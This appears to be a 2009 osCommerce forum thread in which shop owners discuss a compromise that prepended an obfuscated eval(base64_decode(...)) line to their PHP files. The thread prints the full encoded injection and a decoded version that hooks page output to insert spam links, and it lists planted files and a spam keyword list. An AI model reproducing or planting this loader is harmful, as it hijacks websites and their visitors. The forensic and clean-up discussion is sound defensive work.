Did Someone hack my site ? ( Eval Base64 Decode )

[Weedwaka]

I was doing some updating on my site and I notices some strange code appearing in all of my php files at the top .

 

What is this ? I sure as hell did not put it there ? Should I erase it all ?

 

Can I tell when it was added ?

 

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10p

KXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS91c2Vycy93ZWIvYjk2OS9pc

HcuYWN0aXZlL3B1YmxpY19odG1sL2FkbWluL2luY2x1ZGVzL2xhbmd1YWdlcy9lbmdsaXNoL2ltYWdlcy

9idXR0b25zL3N0eWxlLmNzcy5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS91c2Vycy93ZWIvYjk2OS9

pcHcuYWN0aXZlL3B1YmxpY19odG1sL2FkbWluL2luY2x1ZGVzL2xhbmd1YWdlcy9lbmdsaXNoL2ltYWdl

cy9idXR0b25zL3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb

25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbi

BnemRlY29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzM

wODdBMzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjcz

Mjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBM

jA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEOD

ZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFI

yMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNG

QzgxQjIwOTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDR

DFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMz

kzMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3Qjd

BN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4

LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENER

ThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RT

QxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0Q

xQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5

N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxM

EVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQU

RDNjgyRjA2NzMyODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTV

CNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNFMDRE

NzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0dXJuICRSQzRBN

UI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29iaCgkUkRBM0U2MTQxNEU1ME

FFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskUjNFMzN

FMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMy

RjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2Q

zczNjRGQjkxRTJFOTApKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJy

QxJy5nbWwoKSwkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21

sKCkuJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319

fQ==')); ?>

[germ]

click this

[germ]

I decoded it and it tells you where one of the hackers files are:

 

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/users/web/b969/ipw.active/public_html/admin/includes/languages/english/images/buttons/style.css.php')){include_once('/home/users/web/b969/ipw.active/public_html/admin/includes/languages/english/images/buttons/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($R20FD65E9C7406034FADC682F06732868){$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));$R60169CD1C47B7A7A85AB44F884635E41=10;$R0D54236DA20594EC13FC81B209733931=0;if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){$R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){$R60169CD1C47B7A7A85AB44F884635E41+=2;}$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;}return $RC4A5B5E310ED4C323E04D72AFAE39F53;}}function dgobh($RDA3E61414E50AEE968132F03D265E0CF){Header('Content-Encoding: none');$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);}else{return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;}}ob_start('dgobh');}}}

[♥FIMBLE]

I found a very similar script in admin / fckeditor / editor / filemanager / browser / default / images / icons / 32 / sytle.css.php

in someones site last week, another good reason why people need to increase security, at the very least change the admin folder name.

[Weedwaka]

Thanks for the reply's

 

You were correct on the file being on the hackers. I deleted it and cleaned the other files however now I am having some problems.

 

I cant log into my admin at all . Nothing comes up.

 

I am getting the old permissions warning on the includes/configure.php file which is set to 444 and I cant figure out why. Aaarg !!!

 

Why are people such douche bags ??

 

Any help with these problems would be greatly appreciated .

[♥FIMBLE]

This kind of hack usually writes to EVERY php file on your account, you will need to make sure that they all are clean.

I expect that your host has error reporting off, so you will need to view your server error logs or read this article

click me to get the code to add

[Weedwaka]

If anybody wants the information from that file, I can email it. It is too long to post.

[blueflametuna]

Yup, me too! Same identical signature.

 

Almost every php file within the osCommerce hierarchy. /admin, /catalog.

 

All with the same time stamp of Sep 04 2009 07:36 PST.

This is an automated hack. It finds you, embeds itself, and spreads itself around.

 

This appears very similar to one I saw last year.

 

I contacted my hosting provider, and they said there was nothing they could or would do.

"Try osCommerce. It's their code vulnerabilities. Fix the scripts."

 

This is one of the reasons I went through the trouble of moving to a new hosting service,

and upgrading to the v2.2 RC2a.

The previous version had some security issues.

 

Apparently, so does this one.

I am about done with trying to clean up my site on a weekly basis.

Only to have this garbage re-infecting my site again and again.

[Weedwaka]

What is the purpose of this code ?

[blueflametuna]

I haven't followed all of the logic in this one, but if it is similar to the hack from last year,

it embeds the eval stuff at the front of every php file. Which then runs more scripts that have been burried

deeper within your file system.

 

I found these in /admin/includes/languages/english/modules/index

 

cnf

csi

customers.php

dg.php

lock

orders.php

s.php

skwd

style.css.php

style.css.php.orig

swf

 

Only two of which are my original files: customers.php and orders.php.

 

cnf: ASCII text

csi: ASCII text

dg.php: PHP script text

lock: empty

s.php: PHP script text

skwd: ASCII text, with CRLF line terminators

style.css.php: PHP script text

style.css.php.orig: PHP script text

swf: Macromedia Flash data (compressed), version 9

 

csi has an IP address and a UNIX time stamp.

The IP address resolves to some tpnet.pl, a dialup service in Warsaw, Poland.

 

The file skwd is a list of random search words:

 

tramadol

blackjack

craps

onlinecasino

propecia

pokerstars

fulltiltpoker

gambling

casino

casinos

alprazolam

soma

ambien

cialis

ultram

viagra

fioricet

xanax

fiericet

slot

baccarat

carisoprodol

keno

muscle

valium

deposit

deposits

levitra

zoloft

acomplia

acyclovir

betting

realtytrac

intercasino

zithromax

diazepam

sildenafil

tadalafil

valtrex

 

No doubt to be used by Google and other search engines to be linked back to your site,

at locations that have nothing to do with your ecommerce content.

 

Last time, it was some porno sites in China and Russia.

 

And visitors to your site will now be the happy beneficiaries of virii.

I received threats from people saying that I was a porno spammer. Sheesh.

 

 

But this variation isd much more sophisticated.

The prior version was not nearly as prolific, or buried as deep.

 

I am still faced with the prospect of re-uploading my entire site contents,

and resetting all of the directory and file permissions. Hours and hours.

 

And without some reassurance that the vulnerabilities will be fixed in the next six months,

I am forced to make the decision to either check the site daily, or to find a new ecommerce solution.

[Guest]

It got me as well on two sites.

 

Siteground want $50 to fix it or $150 for a 99.9% solution.

 

What I cannot fathom is what they get out of it!!

[blueflametuna]

The hackers get tons of traffic sent to their sites via your server.

It is virtually untraceable. And self replicating. This thing could have been sent out months ago.

As it finds more sites that support php (osCommerce, specifically), it knows precise vulnerabilities.

 

It is our job to figure out how, and to block yet another hole.

 

But don't expect your service provider's tech support to offer you anything more than README files,

and a more expensive solution.

 

That's exactly what I want to do with my next two weeks: Start all over again with yet another eCommerce package,

customizing the cosmetics, developing a new database of products, and finding another hosting company. Oh joy.

[Giovanna]

Why do all that when you can follow the instructions on how to secure your site in the tips and tricks section. Your host cannot help if you dont make sure your installation is not protected.

Main thing is to rename your admin and protect it via your host panel. Read the tips and tricks sectio it is full of information on how to protect yourself and your customers.

[Giovanna]

http://www.oscommerce.com/forums/index.php?showtopic=313323

The direct link to the secure your site info.

[germ]

Yup, me too! Same identical signature.

 

Almost every php file within the osCommerce hierarchy. /admin, /catalog.

 

All with the same time stamp of Sep 04 2009 07:36 PST.

This is an automated hack. It finds you, embeds itself, and spreads itself around.

 

This appears very similar to one I saw last year.

 

I contacted my hosting provider, and they said there was nothing they could or would do.

"Try osCommerce. It's their code vulnerabilities. Fix the scripts."

 

This is one of the reasons I went through the trouble of moving to a new hosting service,

and upgrading to the v2.2 RC2a.

The previous version had some security issues.

 

Apparently, so does this one.

I am about done with trying to clean up my site on a weekly basis.

Only to have this garbage re-infecting my site again and again.

I'd have to disagree.

 

It's been my observation that more often than not it's usually because of the way the site is setup and NOT the software behind it.

 

The site I manage isn't even running the latest V2 of osC and in the 2+ years we've been on the net we've only had two minor "bumps in the road".

 

My observation has been that over 90% of the sites that get hacked are because they have a folder (/images or /catalog/images or /admin/backups usually) set with 777 permissions.

 

It is an undeniable truth that if you have a FOLDER with 777 permissions, because of the way most servers are set up, it's usually only matter of time before you get hacked.

 

Not IF, just WHEN and HOW BAD.

 

Folder permissions should NEVER be higher tha 755 - EVER.

 

These hackers can even get behind the .htaccess file "protecting" the admin if there is a folder back there with 777 permissions. I've seen it happen.

[blueflametuna]

Thank you for your observation. But there are no folders or files with permissions higher thn 755. Most are 644.

There are absolutely no files or folders now, or in the past that were ever set to 777. This was the first thing I checked then,

and is something I have just verified again now.

 

Yours is an easy and obvious suggestion, but not valid in this case. The files are owned by my account, and the server runs with my ownership permissions. The software is permitting the server to overwrite my own files in place, then executing them. It does not need "other" write permissions if it can run as the "owner".

 

I submit that there ARE vulnerabilities in the code, and that even with "best practices" and a secure server,

these hackers are able to circumvent this and do their evil.

 

They are not logging in, they are not using FTP. These are self-midifying scripting tactics, through some form of an input validation bypass, or form processing technique.

[germ]

Then you are among the minority.

 

Security is only as strong as the weakest link.

 

There are a lot of relatively new FTP viruses than can infect your PC, and thru that gain access to your site.

 

If your PC is compromised (and post people can't tell) then your site may be as well.

 

And just because you have an up-to-date antivirus running doesn't necessarily mean your PC is "clean".

 

I used to do a lot of help/posting on an anti-virus/anti malware removal site.

 

Most everyone that had a virus I saw also had an up-to-date antivirus running. I never could figure that one out.

 

There are a few contributions that have known security issues that I have seen.

 

And there might be unknown flaws in the base code.

 

I'm not saying it's immune. I really don't know.

 

My experience is that it's the inexperience of most site owners/operators that leads to problems like this more times than not.

[blueflametuna]

Like I said, they did not login, and they did not use FTP to "upload" new files.

The files were edited in place by prepending the one line <?php eval(base64_decode ... to nearly 1,000 files at once.

 

This has nothing to do with a virus on my PC.

 

It has only to do with a vulnerability within the osCommerce software that they are able to take advantage of.

 

In the previous version, they used global variables. I upgraded to rc2a so that it would no longer use them.

Now there is something new, but I suspect, very similar in its design.

 

Unfortunately, I do not have archives of the access logs, so I cannot prove it, nor enough real-time data to pursue a forensics investigation.

 

I am not a newbie. (Or is it NOOB these days?) I do not even attempt to keep up with the current vernacular,

or local colloquialisms of new age netiquette. But I can still find my way around a keyboard, and navigate through

thousands of lines of code, if need be. It is just frustrating that I should need to. It's a shopping cart app.

[germ]

And until you have access to the server logs, and can prove someone was in a particular osC file with a particular URL and did such-and-such (SQL injection or whatever), the real cause is still unkown.

 

Any "finger pointing" at this point in time is mere conjecture.

 

I've only had two minor "blurps" in two and a half years, and they were my fault.

 

It seems to work for the site I manage so I'm staying.

[Weedwaka]

I am very much a newbie at php. I probably did leave a door open somewhere for this weenie to get in.

 

I am still trying to get my site back up and running because of this crap =/

[Weedwaka]

I haven't followed all of the logic in this one, but if it is similar to the hack from last year,

it embeds the eval stuff at the front of every php file. Which then runs more scripts that have been burried

deeper within your file system.

 

I found these in /admin/includes/languages/english/modules/index

 

cnf

csi

customers.php

dg.php

lock

orders.php

s.php

skwd

style.css.php

style.css.php.orig

swf

 

Only two of which are my original files: customers.php and orders.php.

 

cnf: ASCII text

csi: ASCII text

dg.php: PHP script text

lock: empty

s.php: PHP script text

skwd: ASCII text, with CRLF line terminators

style.css.php: PHP script text

style.css.php.orig: PHP script text

swf: Macromedia Flash data (compressed), version 9

 

csi has an IP address and a UNIX time stamp.

The IP address resolves to some tpnet.pl, a dialup service in Warsaw, Poland.

 

The file skwd is a list of random search words:

 

tramadol

blackjack

craps

onlinecasino

propecia

pokerstars

fulltiltpoker

gambling

casino

casinos

alprazolam

soma

ambien

cialis

ultram

viagra

fioricet

xanax

fiericet

slot

baccarat

carisoprodol

keno

muscle

valium

deposit

deposits

levitra

zoloft

acomplia

acyclovir

betting

realtytrac

intercasino

zithromax

diazepam

sildenafil

tadalafil

valtrex

 

No doubt to be used by Google and other search engines to be linked back to your site,

at locations that have nothing to do with your ecommerce content.

 

Last time, it was some porno sites in China and Russia.

 

And visitors to your site will now be the happy beneficiaries of virii.

I received threats from people saying that I was a porno spammer. Sheesh.

 

 

But this variation isd much more sophisticated.

The prior version was not nearly as prolific, or buried as deep.

 

I am still faced with the prospect of re-uploading my entire site contents,

and resetting all of the directory and file permissions. Hours and hours.

 

And without some reassurance that the vulnerabilities will be fixed in the next six months,

I am forced to make the decision to either check the site daily, or to find a new ecommerce solution.

 

Interestingly enough, I found most of these in the admin/includes/languages/english/images/buttons folder and not the modules/english folder.

 

I still have not found the style.css.php and style.css.org.php files you mentioned.

 

Thanks for the heads up !!

[i2Paq]

I find it strange that if you have directory-acces control on your admin directory they still manage to get in your admin files.

If you are on a shared server it could also be related to the fact that the security on that shared server sucks or that one of the sites on that shared servers has issues.

[Weedwaka]

I seem to have most of this back up now but I cant log into my admin ? Any ideas ?

[Weedwaka]

I seem to have most of this back up now but I cant log into my admin ? Any ideas ?

[Weedwaka]

It does not load up at all . . . just a blank page =/